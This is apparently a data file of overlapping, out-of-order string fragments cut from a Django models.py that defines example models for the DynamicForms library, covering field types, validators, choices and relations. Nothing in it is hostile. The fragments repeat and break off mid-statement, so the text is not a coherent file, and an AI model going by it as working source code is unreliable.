"models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field =",
"= models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model",
"models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class",
"should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=(",
"that you have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how",
"models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True)",
"models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model):",
"null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows",
"it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[",
"class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256)",
"info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me,",
"serializer # and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation,",
"in DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField available only",
"MinValueValidator, RegexValidator from django.db import models from django.utils import timezone class Validated(models.Model): \"\"\"",
"char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field')",
"= models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for",
"null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self):",
"Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide",
"additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please enter",
"'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this",
"AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field",
"on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field",
"= models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please enter something')",
"datetime import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models",
"= models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields",
"only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? # model_field",
"models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def",
"= models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1)",
"8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This",
"models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True,",
"file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/',",
"\"\"\" Shows how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item",
"email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field",
"forms in DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField available",
"file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute",
"max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True)",
"Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True,",
"= models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True,",
"validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True,",
"related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE,",
"characters, followed by up to 8 numbers') ]) enabled = models.BooleanField() amount =",
"default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20,",
"nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True)",
"field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name",
"data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity',",
"= models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field =",
"- timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\" #",
"models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field =",
"'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field",
"MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import timezone class Validated(models.Model):",
"DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field =",
"DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8)",
"in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$',",
"= models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' )",
"help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional",
"models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please enter something') class",
"to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model):",
"class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter",
"help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have",
"in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True,",
"This one should be interesting: will a blank value pass the Min validator?",
"models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),",
"= models.JSONField() # serializer_method_field = models.? # model_field = models.? # Relations #",
")) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice",
"= models.? # Relations # string_related_field, which is always read_only is defined only",
"null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell",
"field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'),",
"always read_only is defined only in serializer # and primary_key_related_field is defined as",
"field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'),",
"Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name",
"please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of",
"django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10,",
"to use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True,",
"how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field",
"point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here')",
"class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many records in",
"(1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4,",
"need to override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D',",
"(1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices',",
"Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string",
"= models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field",
"models.JSONField() # serializer_method_field = models.? # model_field = models.? # Relations # string_related_field,",
"models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True,",
"= models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting:",
"class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char",
"verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice",
"int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3,",
"= models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True)",
"= models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field",
"'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field",
"models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field",
"timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+',",
"models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will a blank value",
"# dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField()",
"import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from",
"enter a string starting with two characters, followed by up to 8 numbers')",
"Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field',",
"\"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field",
"= models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field =",
"\"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a",
"= models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point / comma')",
"one should be interesting: will a blank value pass the Min validator? It",
"models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field",
"the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ...,",
"blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field =",
"2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms",
"('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight',",
"models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ),",
"Shows how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description')",
"default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field =",
"up to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[",
"followed by up to 8 numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True,",
"multi-choice field so you will need to override it in form ('A', 'A'),",
"numbers') ]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one",
"A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\"",
"Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self):",
"models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will",
"PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many records in ViewSet",
"= models.? # model_field = models.? # Relations # string_related_field, which is always",
"note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=(",
"MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice",
"max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field",
"field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field',",
"from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code =",
"'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be",
"field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0,",
"a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional",
"will a blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ])",
"models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name =",
"abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'),",
"decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info",
"blank=True, choices=( # this one will be a multi-choice field so you will",
"should be interesting: will a blank value pass the Min validator? It should!",
"models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=(",
"(None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True)",
"4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field',",
"and DictField not supported in HTML forms in DRF\"\"\" # list_field = models.?",
"field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\"",
"max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field =",
"float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field =",
"= models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field =",
"models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in",
"DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field =",
"= models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True,",
"have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles",
"in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice",
"unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst',",
"blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field =",
"(2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( #",
"related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class",
"# and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE,",
"blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you",
"models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model",
"blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free",
"uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True)",
"models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/',",
"3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\"",
"as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field =",
"= models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True)",
"= models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' )",
"# Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field",
"('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options",
"= models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name",
"\"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.?",
"related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return",
"= models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field",
"help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean",
"url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field",
"(2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with",
"null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation,",
"return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh",
"= models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True,",
"\"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced",
"this one will be a multi-choice field so you will need to override",
"hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'),",
"models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note =",
"PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? # model_field = models.?",
"from django.db import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation",
"defined only in serializer # and primary_key_related_field is defined as its source primary_key_related_field",
"be a multi-choice field so you will need to override it in form",
"= models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note",
"field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2,",
"regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field =",
"\"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime",
"\"\"\" Shows how DynamicForms handles dynamic loading of many records in ViewSet result",
"= models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will a blank",
"Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self):",
"= models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True,",
"= models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True,",
"interesting: will a blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10)",
"time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\"",
"models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field =",
"'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C",
"= models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice",
"how DynamicForms handles dynamic loading of many records in ViewSet result \"\"\" description",
"@property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not",
"models.? # model_field = models.? # Relations # string_related_field, which is always read_only",
"models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field =",
"handles dynamic loading of many records in ViewSet result \"\"\" description = models.CharField(max_length=20,",
"ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'),",
"verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now",
"dynamic loading of many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item",
"choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name",
"'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True)",
"models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True,",
"models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No",
"you have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms",
"= models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field",
"MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0,",
"so you will need to override it in form ('A', 'A'), ('B', 'B'),",
"models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True)",
"name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available",
"password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\"",
"__str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\"",
"models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8)",
"def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles",
"shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic",
"choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True,",
"('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld",
"HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc",
"null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field =",
"\"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice",
"DRF\"\"\" # list_field = models.? # dict_field = models.? \"\"\"JSONField available only for",
"is defined only in serializer # and primary_key_related_field is defined as its source",
"3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field",
"= models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field",
"blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20,",
"null=True, blank=True, help_text='Now that you have shown me, please enter something') class PageLoad(models.Model):",
"only in serializer # and primary_key_related_field is defined as its source primary_key_related_field =",
"records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1,",
"verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice",
"= models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10, choices=( (None,",
"null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field",
"It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type =",
"enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be",
"class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16) def",
"models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class",
"field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class",
"from datetime import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import",
"= models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'),",
"= models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class",
"models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field =",
"'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags",
"help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')),",
"models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point / comma') cst_fld",
"verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer",
"loading of many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description')",
"models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field = models.CharField(null=True,",
"models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed by",
"RegexValidator from django.db import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows",
"(0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer",
"('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen',",
"('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ])",
"to hide unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs',",
"4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be a",
